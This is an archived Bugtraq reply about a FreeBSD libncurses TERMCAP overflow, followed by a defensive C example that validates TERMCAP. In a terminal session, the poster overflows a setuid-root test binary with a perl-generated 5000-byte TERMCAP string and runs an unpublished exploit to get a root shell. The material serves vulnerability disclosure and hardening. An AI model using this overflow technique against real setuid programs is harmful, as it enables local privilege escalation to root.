Bugtraq mailing list archives
Re: freebsd libncurses overflow
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Tue, 25 Apr 2000 10:50:42 +0200
Furthermore, it is not actually a vulnerability. It seems that setuid programs will not accept an alternate termcap file via TERMCAP even under the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can only be used on your own binaries.
Sure?

lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin () lubi freebsd lublin pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any ncurses functions.

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
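The session above shows a setuid binary handing an attacker-controlled TERMCAP value to a fixed-size termcap buffer. As an added illustration (not code from the post, from ncurses or from FreeBSD), here is the policy a privileged program or its terminal library should apply before trusting that variable: ignore it whenever real and effective ids differ (the same idea as issetugid(2)) and refuse an entry that would not fit the buffer. The 1024-byte buffer size and the function name vet_termcap are assumptions made for this example.

```c
/* Added example: defensive handling of the TERMCAP environment variable.
 * Not taken from the original post; TERMCAP_MAX and vet_termcap are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define TERMCAP_MAX 1024   /* assumed capacity of the fixed termcap buffer */

enum termcap_verdict {
    TERMCAP_NONE,           /* variable unset or empty: use the system database */
    TERMCAP_IGNORED_SETUID, /* privileged context: never trust a caller-supplied entry */
    TERMCAP_TOO_LONG,       /* would overflow the buffer: refuse, do not truncate */
    TERMCAP_ACCEPTED        /* copied into buf, NUL-terminated */
};

/* Pure decision function, so the policy can be tested without a setuid binary.
 * The privilege check comes first: in a setuid/setgid process the value is
 * discarded regardless of its content or length. */
enum termcap_verdict vet_termcap(const char *value, uid_t ruid, uid_t euid,
                                 gid_t rgid, gid_t egid, char *buf, size_t buflen)
{
    if (ruid != euid || rgid != egid)
        return TERMCAP_IGNORED_SETUID;
    if (value == NULL || value[0] == '\0')
        return TERMCAP_NONE;
    size_t len = strlen(value);
    if (len >= buflen)                 /* leave room for the terminating NUL */
        return TERMCAP_TOO_LONG;
    memcpy(buf, value, len + 1);
    return TERMCAP_ACCEPTED;
}

int main(void)
{
    char buf[TERMCAP_MAX];
    /* Live ids of this process decide whether $TERMCAP is honoured at all. */
    enum termcap_verdict v = vet_termcap(getenv("TERMCAP"), getuid(), geteuid(),
                                         getgid(), getegid(), buf, sizeof buf);
    printf("TERMCAP verdict: %d\n", (int)v);
    return 0;
}
```

Run with a 5000-byte TERMCAP as in the session above and the verdict is TERMCAP_TOO_LONG rather than a write past the end of the buffer; run as a setuid binary and the variable is not consulted at all.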